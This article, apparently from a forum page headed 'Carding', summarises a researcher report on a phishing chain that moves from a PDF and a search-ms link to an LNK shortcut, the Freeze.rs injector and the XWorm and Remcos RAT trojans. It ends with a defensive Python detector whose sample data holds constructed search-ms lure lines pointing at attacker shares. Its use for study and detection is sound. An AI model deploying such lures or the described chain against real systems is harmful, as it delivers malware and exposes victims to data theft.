Carding
Professional
The complex attack chain uses the legitimate Freeze.rs tool and leads to the installation of the XWorm and Remcos RAT Trojans.
Cybercriminals have launched a new chain of attacks to deploy "XWorm" and "Remcos RAT" malware using the legitimate Rust injector "Freeze.rs". The malicious operation was uncovered by FortiGuard Labs on July 13, 2023.
The attack starts with a phishing email carrying a malicious PDF. When the PDF is opened, it redirects the victim to an HTML file, which in turn uses the "search-ms" protocol to reach an LNK file (essentially an ordinary Windows shortcut with a prescribed launch parameter) hosted on a remote server, the researchers explained. Launching that shortcut runs a PowerShell script, which starts the Freeze.rs and SYK Crypter injectors for the subsequent stages of the attack.
Released in May 2023, Freeze.rs is a legitimate hacking tool for bypassing security controls and silently executing shellcode; it is available for download on GitHub.
SYK Crypter, in turn, is used to distribute various malware such as AsyncRAT, NanoCore RAT, njRAT, QuasarRAT, RedLine Stealer, and Warzone RAT (also known as Ave Maria). SYK Crypter is loaded via a .NET loader attached to emails that masquerade as harmless purchase orders.
In the final step, the decrypted shellcode runs the XWorm remote access Trojan, which collects sensitive data such as system information, screenshots and keystrokes and gives the operator remote control of the compromised device. Alongside XWorm, apparently to broaden the malicious capabilities, a second remote access Trojan, Remcos RAT, is also launched on the victim's computer.
[Figure: complete attack chain identified by the researchers]
It is worth noting that, more recently, Trellix has identified similar infection sequences with HTML and PDF attachments that launch a search process on an attacker-controlled server and then display the malicious files in Windows Explorer as local search results. We talked about this very interesting malicious operation a couple of weeks ago.
The FortiGuard researchers' findings are similar: the files masquerade as PDFs but are actually malicious shortcuts that execute a PowerShell script to launch the Rust injector, while a decoy PDF document is displayed to avert suspicion.
"The combination of XWorm and Remcos RAT creates a formidable threat with a host of malicious features," the researchers say. "The attacker's C2 server traffic report shows that Europe and North America are the main targets of this malicious campaign."
That the relatively new Freeze.rs hacking tool, released only 3 months ago, is already being used in real attacks illustrates how quickly attackers adopt new, effective tools rather than miss the opportunity to add them to their arsenal.
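The pivot in the chain above is the "search-ms" protocol handler: an HTML page points Windows Explorer at a folder on an attacker-controlled share and gives it a friendly display name, so the remote LNK shows up as if it were a local search result. The following is an added detection example written for this post (it is not code from the original article, FortiGuard or Trellix); it scans HTML or email-body lines for search-ms URIs, decodes the percent-encoded parameters that the protocol uses (query, crumb=location:, displayname), and flags only those whose location is a UNC path or URL outside the local host. The sample lines, host names and share names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not from the original article): two search-ms
# lures pointing at remote shares, one benign local search-ms link and one
# ordinary HTTPS link for contrast.
SAMPLE_LINES = [
    '<meta http-equiv="refresh" content="0; url=search-ms:query=invoice'
    '&crumb=location:%5C%5C198.51.100.7%5Cshare&displayname=Downloads">',
    '<a href="search-ms:query=report&crumb=location:C:%5CUsers%5CPublic">local</a>',
    '<a href="https://example.org/docs/report.pdf">Report</a>',
    "window.location.href = 'search-ms:query=*&crumb=location:"
    "\\\\attacker.example%5Cpayloads&displayname=Invoices';",
]

# A search-ms URI runs until whitespace, a quote or an angle bracket.
SEARCH_MS_RE = re.compile(r"search-ms:[^\"'\s<>]+", re.IGNORECASE)


def parse_search_ms(uri):
    """Split a search-ms URI into its parameters, percent-decoding each value.

    The documented form is search-ms:param=value[&param=value]...; keys are
    lower-cased so that lookups are case-insensitive.
    """
    params = {}
    body = uri.split(":", 1)[1]
    for part in body.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            params[key.lower()] = unquote(value)
    return params


def is_remote_location(location):
    """True when the crumb location leaves the host: a UNC path or a URL."""
    loc = location.strip()
    if loc.startswith("\\\\") or loc.startswith("//"):
        return True
    return re.match(r"^(file|https?)://", loc, re.IGNORECASE) is not None


def scan_for_remote_search_ms(lines):
    """Return (line_index, uri, location, displayname) for every search-ms URI
    whose crumb location is remote; local searches are left alone."""
    findings = []
    for index, line in enumerate(lines):
        for match in SEARCH_MS_RE.finditer(line):
            uri = match.group(0)
            params = parse_search_ms(uri)
            crumb = params.get("crumb", "")
            if not crumb.lower().startswith("location:"):
                continue
            location = crumb[len("location:"):]
            if is_remote_location(location):
                # displayname is the label the victim sees in Explorer; a
                # generic name such as "Downloads" over a remote share is a lure.
                findings.append((index, uri, location, params.get("displayname", "")))
    return findings


if __name__ == "__main__":
    for index, uri, location, name in scan_for_remote_search_ms(SAMPLE_LINES):
        print(f"line {index}: remote search-ms location {location!r} shown as {name!r}")
```

The check is deliberately narrow: a search-ms URI with a local crumb (a user's own profile folder) is normal Windows behaviour and is not reported, whereas a remote UNC or WebDAV location combined with a reassuring display name is exactly the shape of the lure described above. The same parser can be pointed at email gateway logs or proxy logs that record the HTML bodies.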